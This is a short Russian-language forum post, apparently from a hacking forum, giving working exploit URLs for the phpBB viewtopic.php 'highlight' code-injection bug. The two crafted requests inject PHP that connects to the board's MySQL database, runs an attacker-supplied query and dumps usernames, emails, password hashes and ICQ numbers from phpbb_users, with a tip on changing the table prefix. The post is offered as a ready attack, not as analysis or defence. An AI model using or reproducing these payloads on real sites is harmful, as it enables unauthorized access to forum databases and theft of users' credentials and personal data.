Вот полазил по гуглу - баг php ещё рулит, тока вот далеко не на всех сервах можно выполнить команду system(), а мне хотелось получить не которые данные из базы. ВОт что получилось в результате:

viewtopic.php?t=[topic]&highlight=%2527.mysql_connect($dbhost,$dbuser,$db passwd).($mvar=mysql_db_query($dbname,$_GET[sqlq])).print(mysql_num_rows($mvar)).mysql_close().%252 7&sqlq=SELECT+username,user_email,user_password,us er_icq+FROM+phpbb_users+WHERE+LENGTH(user_icq)%3E5 +AND+LENGTH(user_icq)%3C9;
этим получаем количество записей соответствующих запросу

viewtopic.php?t=[topic]&highlight=%2527.mysql_connect($dbhost,$dbuser,$db passwd).($mvar=mysql_db_query($dbname,$_GET[sqlq])).(($llrow=mysql_fetch_array($mvar))?0:1).print(s erialize($llrow).(($llrow=mysql_fetch_array($mvar) )?0:1).print(serialize($llrow). {...} .$_GET[br]).mysql_close().%2527&sqlq=SELECT+username,user_em ail,user_password,user_icq+FROM+phpbb_users+WHERE+ LENGTH(user_icq)%3E5+AND+LENGTH(user_icq)%3C9;&br= <br>
это получаем данные. {...} - здесь N-ое количество
(($llrow=mysql_fetch_array($mvar))?0:1).print(seri alize($llrow).
P.S.: в обоих запросах считается, что префих тавлиц phpbb_, если он другой, нужно его заменить.